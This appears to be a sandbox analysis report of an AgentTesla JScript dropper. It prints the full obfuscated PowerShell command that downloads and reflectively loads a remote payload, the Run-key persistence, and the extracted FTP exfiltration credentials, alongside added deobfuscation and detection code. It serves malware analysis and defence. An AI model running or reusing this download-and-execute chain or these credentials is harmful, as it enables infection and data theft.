Windows Analysis Report
scan_374783.js

Overview

General Information

Sample name: scan_374783.js
Analysis ID: 1528227
MD5: c6b0c8c717d6f6b0fc0747c349821280
SHA1: e7b0686c4eebc8285ae5a2eb2c70a602b451b0d6
SHA256: 9eb68fe0683e79b88e4b37a2b038336192b516c5f975bf8636dc1565432bbdbc
Tags: jsuser-lowmal3

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Command shell drops VBS files
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

(classification diagram not reproduced)

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5368 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_374783.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6688 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7176 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('B'+'08url = C'+'7Ihttps://ra'+'w.'+'gi'+'thu'+'bu'+'sercont'+'ent'+'.c'+'om/N'+'oDetectO'+'n/NoDe'+'tectOn/refs'+'/h'+'ea'+'d'+'s'+'/'+'m'+'ain/De'+'tahNo'+'th-V'+'.t'+'xtC'+'7I; B0'+'8bas'+'e64C'+'o'+'ntent = (New-Obj'+'ec'+'t System.Net.We'+'bClient).D'+'ownlo'+'ad'+'Str'+'i'+'ng(B'+'08u'+'rl'+'); B0'+'8'+'bina'+'r'+'y'+'C'+'ont'+'ent ='+' [Syst'+'em.Conve'+'rt]::'+'Fr'+'omBase64Strin'+'g('+'B0'+'8ba'+'se64'+'Cont'+'ent); '+'B08assembly '+'= [Refl'+'ec'+'t'+'ion.Assembly]::L'+'oad(B08'+'binaryC'+'o'+'nten'+'t)'+'; [dnlib'+'.I'+'O.H'+'om'+'e'+']::VA'+'I('+'pQ'+'U884e'+'8e0d52'+'f0-'+'e5a'+'b-'+'1'+'164-00c6'+'-aaa2ff5e'+'='+'n'+'e'+'k'+'ot&aidem=tla?tx'+'t'+'.42020170nig'+'irore'+'ivax/o/mo'+'c.'+'topsppa.4202s'+'tpyr'+'c'+'/b/0v'+'/moc'+'.'+'sipaelg'+'oog'+'.e'+'garo'+'t'+'sesab'+'erif'+'//:'+'s'+'pt'+'thpQU,'+' pQU1pQU,'+' pQUC:T'+'4yProgramData'+'T4'+'y'+'pQU, p'+'QUa'+'lcati'+'fap'+'QU, pQUAddInPr'+'ocess3'+'2'+'pQU, pQ'+'UpQU,p'+'QU'+'p'+'QU)') -CrepLaCe ([ChaR]112+[ChaR]81+[ChaR]85),[ChaR]34 -CrepLaCe ([ChaR]67+[ChaR]55+[ChaR]73),[ChaR]39 -RePlAce ([ChaR]66+[ChaR]48+[ChaR]56),[ChaR]36 -RePlAce ([ChaR]84+[ChaR]52+[ChaR]121),[ChaR]92)|.( ([sTRinG]$VeRBoSepreFerENce)[1,3]+'X'-JOin'')" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7296 cmdline: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\alcatifa.vbs" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • AddInProcess32.exe (PID: 7360 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • wscript.exe (PID: 7596 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\alcatifa.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 7688 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\alcatifa.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
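The stage-2 command line of PID 7176 hides its script behind three layers that all undo mechanically: the text is split into single-quoted fragments joined with +; the characters PowerShell would otherwise have to escape (", ', $ and \) are swapped for the placeholder tokens pQU, C7I, B08 and T4y and restored with -creplace/-replace clauses built from [char] codes; and the result is piped to the call operator with a cmdlet name assembled from characters 1 and 3 of $VerbosePreference plus 'X', which is 'ieX' (the Invoke-Expression alias) when that variable has its default value SilentlyContinue. The Python below is an added example written for this page, not tooling from Joe Sandbox or from the sample's authors; it replays those steps on the command line quoted in the tree. Because the report redacts the base64 blob assigned to $Codigo in PID 6688, the stage-1 input is constructed here by encoding the stage-2 command the way that stage expects (UTF-16LE, then base64). Reversing the first argument passed to [dnlib.IO.Home]::VAI is an analyst observation about that string (it ends in 'sptth'), not behaviour the report attributes to the loader.

```python
import base64
import re
from typing import List, Optional

# Stage-2 "-command" argument of PID 7176, copied verbatim from the process tree above.
OBFUSCATED = r"""(('B'+'08url = C'+'7Ihttps://ra'+'w.'+'gi'+'thu'+'bu'+'sercont'+'ent'+'.c'+'om/N'+'oDetectO'+'n/NoDe'+'tectOn/refs'+'/h'+'ea'+'d'+'s'+'/'+'m'+'ain/De'+'tahNo'+'th-V'+'.t'+'xtC'+'7I; B0'+'8bas'+'e64C'+'o'+'ntent = (New-Obj'+'ec'+'t System.Net.We'+'bClient).D'+'ownlo'+'ad'+'Str'+'i'+'ng(B'+'08u'+'rl'+'); B0'+'8'+'bina'+'r'+'y'+'C'+'ont'+'ent ='+' [Syst'+'em.Conve'+'rt]::'+'Fr'+'omBase64Strin'+'g('+'B0'+'8ba'+'se64'+'Cont'+'ent); '+'B08assembly '+'= [Refl'+'ec'+'t'+'ion.Assembly]::L'+'oad(B08'+'binaryC'+'o'+'nten'+'t)'+'; [dnlib'+'.I'+'O.H'+'om'+'e'+']::VA'+'I('+'pQ'+'U884e'+'8e0d52'+'f0-'+'e5a'+'b-'+'1'+'164-00c6'+'-aaa2ff5e'+'='+'n'+'e'+'k'+'ot&aidem=tla?tx'+'t'+'.42020170nig'+'irore'+'ivax/o/mo'+'c.'+'topsppa.4202s'+'tpyr'+'c'+'/b/0v'+'/moc'+'.'+'sipaelg'+'oog'+'.e'+'garo'+'t'+'sesab'+'erif'+'//:'+'s'+'pt'+'thpQU,'+' pQU1pQU,'+' pQUC:T'+'4yProgramData'+'T4'+'y'+'pQU, p'+'QUa'+'lcati'+'fap'+'QU, pQUAddInPr'+'ocess3'+'2'+'pQU, pQ'+'UpQU,p'+'QU'+'p'+'QU)') -CrepLaCe ([ChaR]112+[ChaR]81+[ChaR]85),[ChaR]34 -CrepLaCe ([ChaR]67+[ChaR]55+[ChaR]73),[ChaR]39 -RePlAce ([ChaR]66+[ChaR]48+[ChaR]56),[ChaR]36 -RePlAce ([ChaR]84+[ChaR]52+[ChaR]121),[ChaR]92)|.( ([sTRinG]$VeRBoSepreFerENce)[1,3]+'X'-JOin'')"""

# The report redacts the blob PID 6688 assigns to $Codigo. This CONSTRUCTED stand-in encodes
# the stage-2 command the way stage 1 decodes it (UTF-16LE bytes, then base64).
CONSTRUCTED_CODIGO = base64.b64encode(OBFUSCATED.encode("utf-16-le")).decode("ascii")


def decode_stage1(codigo_b64: str) -> str:
    """Stage 1: [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo))."""
    return base64.b64decode(codigo_b64).decode("utf-16-le")


def concat_literals(expr: str) -> str:
    """Evaluate a PowerShell 'a'+'b'+'c' chain by joining its single-quoted literals in order."""
    return "".join(re.findall(r"'([^']*)'", expr))


def parse_replacements(cmd: str):
    """Yield (token, replacement, case_sensitive) for every
    -replace/-creplace ([ChaR]n+[ChaR]m+...),[ChaR]k clause on the command line."""
    clause = re.compile(r"-(c?)replace\s+\(((?:\[char\]\d+\+?)+)\),\[char\](\d+)", re.I)
    for m in clause.finditer(cmd):
        token = "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(2)))
        yield token, chr(int(m.group(3))), m.group(1).lower() == "c"


def deobfuscate(cmd: str) -> str:
    """Rebuild the script: join the fragments, then restore the placeholder characters.
    PowerShell's -replace is a case-insensitive regex and -creplace a case-sensitive one,
    so the same flags are used; a lambda keeps the backslash replacement literal."""
    m = re.search(r"\(\((.*?)\)\s+-c?replace", cmd, re.I | re.S)
    if not m:
        raise ValueError("no (('..'+'..') -replace chain found")
    text = concat_literals(m.group(1))
    for token, repl, case_sensitive in parse_replacements(cmd):
        text = re.sub(re.escape(token), lambda _m: repl, text,
                      flags=0 if case_sensitive else re.I)
    return text


def resolve_invoker(verbose_preference: str = "SilentlyContinue") -> str:
    """The trailing |.( ([sTRinG]$VeRBoSepreFerENce)[1,3]+'X'-JOin'' ) names its cmdlet
    from characters 1 and 3 of $VerbosePreference (default 'SilentlyContinue') plus 'X'."""
    return verbose_preference[1] + verbose_preference[3] + "X"


def vai_arguments(script: str) -> List[str]:
    """Return the double-quoted arguments of the [dnlib.IO.Home]::VAI(...) call."""
    m = re.search(r"::VAI\((.*)\)\s*$", script)
    if not m:
        raise ValueError("no ::VAI(...) call found")
    return re.findall(r'"([^"]*)"', m.group(1))


def recover_reversed_url(arg: str) -> Optional[str]:
    """Analyst check (not behaviour the report attributes to the loader): the first VAI
    argument ends in 'sptth', i.e. 'https' backwards, so reverse it to read the URL."""
    return arg[::-1] if arg.endswith("sptth") else None


if __name__ == "__main__":
    stage2 = decode_stage1(CONSTRUCTED_CODIGO)
    script = deobfuscate(stage2)
    print("invoker :", resolve_invoker())
    print("script  :", script)
    for i, arg in enumerate(vai_arguments(script)):
        url = recover_reversed_url(arg)
        print(f"VAI[{i}] : {arg!r}" + (f"  -> {url}" if url else ""))
```

Running the block prints the recovered script: it downloads a base64 text from raw.githubusercontent.com, loads it with [Reflection.Assembly]::Load and calls VAI with a reversed firebasestorage.googleapis.com URL, "1", C:\ProgramData\, alcatifa, AddInProcess32 and two empty strings. Those arguments line up with the copy to C:\ProgramData\alcatifa.vbs, the Run key value and the AddInProcess32.exe child seen elsewhere in this report.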
Malware Configuration

Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Extracted configuration (AgentTesla): {"Exfil Mode": "FTP", "Host": "ftp://ftp.fosna.net", "Username": "sarthiever@fosna.net", "Password": "(=8fPSH$KO_!"}
Yara Overview

Memory dumps (Source | Rule | Description | Author | Strings):
0000000E.00000002.2549002759.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000E.00000002.2549002759.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000E.00000002.2553669358.0000000002B05000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
Unpacked PEs (Source | Rule | Description | Author | Strings):
11.2.powershell.exe.27d11278980.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
11.2.powershell.exe.27d11278980.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
11.2.powershell.exe.27d11278980.0.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  • 0x325c5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x32637:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x326c1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x32753:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x327bd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x3282f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x328c5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x32955:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
11.2.powershell.exe.27d11278980.0.unpack | MALWARE_Win_AgentTeslaV2 | AgenetTesla Type 2 Keylogger payload | ditekSHen
  • 0x2f78d:$s2: GetPrivateProfileString
  • 0x2ee5d:$s3: get_OSFullName
  • 0x304a3:$s5: remove_Key
  • 0x30693:$s5: remove_Key
  • 0x315ac:$s6: FtpWebRequest
  • 0x325a7:$s7: logins
  • 0x32b19:$s7: logins
  • 0x357fc:$s7: logins
  • 0x358dc:$s7: logins
  • 0x37231:$s7: logins
  • 0x36476:$s9: 1.85 (Hash, version 2, native byte-order)
14.2.AddInProcess32.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(the report lists 9 entries in this table; only those shown above are reproduced)

Sigma Overview

System Summary

Sigma rule matches, one line per matching rule. The stage-2 PowerShell command line of PID 7176 is quoted in full in the process tree and is written below as <PID 7176 command line>; the base64 blob assigned to $Codigo by PID 6688 is redacted in the report.

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
Source: Process started | Author: Thomas Patzke | Data: Command: <PID 7176 command line>, CommandLine: <PID 7176 command line>, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Sys
Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp) | Data: Command: <PID 7176 command line>, CommandLine: <PID 7176 command line>, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Sys
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
Source: Network Connection | Author: frack113, Florian Roth | Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5368, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49699
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_374783.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_374783.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_374783.js", ProcessId: 5368, ProcessName: wscript.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\ProgramData\alcatifa.vbs, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7176, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path
Source: Network Connection | Author: frack113 | Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5368, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49699
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\alcatifa.vbs", CommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\alcatifa.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: <PID 7176 command line>, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7176, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\alcatifa.vbs", ProcessId: 7296, ProcessName: cmd.exe
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_374783.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_374783.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_374783.js", ProcessId: 5368, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton | Data: Command: <PID 7176 command line>, CommandLine: <PID 7176 command line>, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Sys
                  No Suricata rule has matched
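Every Sigma match listed above fires on fields that ordinary endpoint telemetry already carries: process image, parent image, command line, and registry value writes. As an added illustration for this page (not a rule set from the report, from Joe Sandbox or from the Sigma project), the Python below encodes the chain as a handful of field-level checks and runs them over a constructed event list whose values are copied from the process tree and match data above. Two fields are stand-ins and are marked as such in the code: the redacted $Codigo blob is replaced by a short placeholder, and the stage-2 command line of PID 7176 is cut to its first fragments; a benign PowerShell event (PID 9001) is added as a control that must not alert.

```python
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple


@dataclass
class Event:
    kind: str                 # "ProcessCreate" or "RegistrySet"
    pid: int
    image: str = ""
    cmdline: str = ""
    parent_image: str = ""
    target: str = ""          # RegistrySet: value path
    details: str = ""         # RegistrySet: data written


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WSCRIPT = r"C:\Windows\System32\wscript.exe"

# CONSTRUCTED telemetry. Values come from the process tree and Sigma match data in the report;
# the redacted $Codigo blob is replaced by a short placeholder, the PID 7176 command line is cut
# to its first fragments, and PID 9001 is a benign control that must not alert.
EVENTS = [
    Event("ProcessCreate", 5368, WSCRIPT,
          r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_374783.js"'),
    Event("ProcessCreate", 6688, PS,
          '"' + PS + "\" -command $Codigo = 'QQBBAA==';$OWjuxD = [system.Text.encoding]::Unicode"
          ".GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden"
          " -executionpolicy bypass -NoProfile -command $OWjuxD", WSCRIPT),
    Event("ProcessCreate", 7176, PS,
          '"' + PS + "\" -windowstyle hidden -executionpolicy bypass -NoProfile -command \"(('B'+'08url = C'"
          "+'7Ihttps://ra'+'w.') -CrepLaCe ([ChaR]112+[ChaR]81+[ChaR]85),[ChaR]34 -RePlAce "
          "([ChaR]66+[ChaR]48+[ChaR]56),[ChaR]36)|.( ([sTRinG]$VeRBoSepreFerENce)[1,3]+'X'-JOin'')\"", PS),
    Event("ProcessCreate", 7296, r"C:\Windows\System32\cmd.exe",
          r'"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\alcatifa.vbs"', PS),
    Event("RegistrySet", 7176, PS,
          target=r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path",
          details=r"C:\ProgramData\alcatifa.vbs"),
    Event("ProcessCreate", 7596, WSCRIPT, r'"C:\Windows\System32\WScript.exe" "C:\ProgramData\alcatifa.vbs"'),
    Event("ProcessCreate", 9001, PS, '"' + PS + '" -NoProfile -Command Get-Date', r"C:\Windows\explorer.exe"),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_FILE = re.compile(r'\.(js|jse|vbs|vbe|wsf)"?\s*$', re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_proc(e: Event, *names: str) -> bool:
    return e.kind == "ProcessCreate" and basename(e.image) in names


def wscript_runs_script_file(e: Event) -> bool:
    """Script file (js/jse/vbs/vbe/wsf) executed via cscript or wscript."""
    return is_proc(e, *SCRIPT_HOSTS) and SCRIPT_FILE.search(e.cmdline) is not None


def script_host_spawns_powershell(e: Event) -> bool:
    """WScript/CScript dropper: a script host is the parent of PowerShell."""
    return is_proc(e, "powershell.exe") and basename(e.parent_image) in SCRIPT_HOSTS


def ps_execution_policy_bypass(e: Event) -> bool:
    return is_proc(e, "powershell.exe") and re.search(
        r"-(executionpolicy|ep|exec)\s+bypass", e.cmdline, re.I) is not None


def ps_frombase64string(e: Event) -> bool:
    return is_proc(e, "powershell.exe") and "frombase64string" in e.cmdline.lower()


def ps_char_obfuscation(e: Event) -> bool:
    """[char]N+[char]M token building, or an invoker spelled out of $VerbosePreference."""
    return is_proc(e, "powershell.exe") and re.search(
        r"\[char\]\d+\+\[char\]\d+|\$verbosepreference\)\[1,3\]", e.cmdline, re.I) is not None


def copy_script_to_programdata(e: Event) -> bool:
    """cmd.exe copying a script file into the ProgramData directory."""
    return is_proc(e, "cmd.exe") and re.search(
        r'\bcopy\b.*\\programdata\\[^"]*\.(js|jse|vbs|vbe|wsf)', e.cmdline, re.I) is not None


def run_key_points_to_script(e: Event) -> bool:
    """CurrentVersion Run value whose data is a script file (registry-only persistence)."""
    return (e.kind == "RegistrySet" and "\\currentversion\\run\\" in e.target.lower()
            and SCRIPT_FILE.search(e.details) is not None)


RULES: Dict[str, Callable[[Event], bool]] = {
    fn.__name__: fn for fn in (
        wscript_runs_script_file, script_host_spawns_powershell, ps_execution_policy_bypass,
        ps_frombase64string, ps_char_obfuscation, copy_script_to_programdata, run_key_points_to_script)
}


def alerts(events: List[Event]) -> List[Tuple[str, int]]:
    """Run every rule over every event; return (rule name, pid) pairs in event order."""
    return [(name, e.pid) for e in events for name, rule in RULES.items() if rule(e)]


def chain_observed(events: List[Event]) -> bool:
    """True when the script host -> PowerShell -> copied script -> Run key pattern is complete."""
    hit = {name for name, _ in alerts(events)}
    return {"script_host_spawns_powershell", "copy_script_to_programdata", "run_key_points_to_script"} <= hit


if __name__ == "__main__":
    for name, pid in alerts(EVENTS):
        print(f"{pid:>5}  {name}")
    print("full chain observed:", chain_observed(EVENTS))
```

The single-event rules are deliberately narrow; the value for triage is in chain_observed, which requires the dropper, the copy into ProgramData and the Run key together, the combination that distinguishes this sample's persistence from an administrator's one-off script.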

                  AV Detection

Source: 14.2.AddInProcess32.exe.400000.0.unpack | Malware Configuration Extractor: AgentTesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.fosna.net", "Username": "sarthiever@fosna.net", "Password": "(=8fPSH$KO_!"}
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.7:49709 version: TLS 1.2
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000B.00000002.1476246463.00007FFAAC5C0000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
